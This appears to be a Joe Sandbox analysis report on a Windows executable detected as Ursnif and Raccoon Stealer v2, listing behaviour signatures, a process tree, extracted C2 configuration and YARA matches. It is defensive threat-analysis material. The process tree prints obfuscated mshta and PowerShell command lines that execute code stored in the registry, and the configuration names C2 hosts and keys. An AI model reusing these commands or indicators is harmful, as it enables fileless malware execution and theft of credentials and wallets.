Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EJ6FBXJ9Dg.exe

Overview

General Information

Sample Name:EJ6FBXJ9Dg.exe
Analysis ID:722131
MD5:5949348fedecc598cdbce7072639231f
SHA1:a9a614ecb4871b57da47b32ce572c46493de6897
SHA256:2fffec7d345d16c2480ea2f3f2e046e220488486c81cf7e1c14adfab890ec0b1
Tags:exeRecordBreaker
Infos:

Detection

Ursnif, Raccoon Stealer v2
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Ursnif
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus / Scanner detection for submitted sample
Hooks registry keys query functions (used to hide registry keys)
Writes or reads registry keys via WMI
Found evasive API chain (may stop execution after checking system information)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Found API chain indicative of debugger detection
Modifies the prolog of user mode functions (user mode inline hooks)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
PE file contains more sections than normal
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Extensive use of GetProcAddress (often used to hide API calls)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • EJ6FBXJ9Dg.exe (PID: 5144 cmdline: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe MD5: 5949348FEDECC598CDBCE7072639231F)
    • XHSRZM23.exe (PID: 1460 cmdline: "C:\Users\user\AppData\Roaming\XHSRZM23.exe" MD5: B7CE4F9F6ECD85BB5EDBB6964226FDB6)
  • mshta.exe (PID: 1120 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ndam='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ndam).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nhefowhe -value gp; new-alias -name ucvjneg -value iex; ucvjneg ([System.Text.Encoding]::ASCII.GetString((nhefowhe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4712 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mkr2iq4u.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3320 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF206.tmp" "c:\Users\user\AppData\Local\Temp\CSCC9AB450BCFA441ED9B999D6FD5DE3822.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5956 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jv54rgf4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5780 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF35.tmp" "c:\Users\user\AppData\Local\Temp\CSC20F2306B39284E32B5AB6E9725E2189D.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup
{"C2 url": ["http://188.127.227.51/"], "Bot ID": "b3ca3fc91779633a47981045668e09c4", "RC4_key1": "b3ca3fc91779633a47981045668e09c4"}
{"RSA Public Key": "GEoaf/PsReruXzGPGUIgqWKnqoR7Hg9dOcT4nBssSx1nY9FAsRGi/E2tdzMI0njP6dLpZXQyBSxb2YN/N71RkIFe8BRQooe+s0DlXnJzyHYmt5vun+EavdlJKBsHKfikcIwJi8dHMcwPCVkp15cXW+FtNdcJ16MzDk0HRi26tZpwtGzsz5DaHHaw0yA6g52Dl8eUU+3S/MbS+zgMU3bd2jx4qwfKswaXM81OoMrm/tnuJLNFeIEk3OyzFEsObImHW4kh+539YoFhjTBOSMFqoVRYaZoeDOzojnXc0eoSRdCyTgvIwyzI4H4U/DMlfmvCLI5Axykns+KODb1pRLrq7RDL/5mrYprCWyjX3yV9fCU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "YFVenkBsAbUmuHYi", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *wallet* *bank* *banco*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "10103", "SetWaitableTimer_value": "1"}
SourceRuleDescriptionAuthorStrings
EJ6FBXJ9Dg.exeJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000002.564376637.00000000014A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0xff0:$a1: /C ping localhost -n %u && del "%s"
      • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xca8:$a5: filename="%.4u.%lu"
      • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe72:$a9: &whoami=%s
      • 0xe5a:$a10: %u.%u_%u_%u_x%u
      • 0xc22:$a11: size=%u&hash=0x%08x
      • 0xc13:$a12: &uptime=%u
      • 0xda7:$a13: %systemroot%\system32\c_1252.nls
      • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
      00000001.00000002.564376637.00000000014A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
      • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
      • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
      • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
      • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
      • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
      00000007.00000002.616496245.0000024ABD467000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000000.00000003.311564503.0000000000992000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
          00000000.00000003.313851264.0000000000992000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security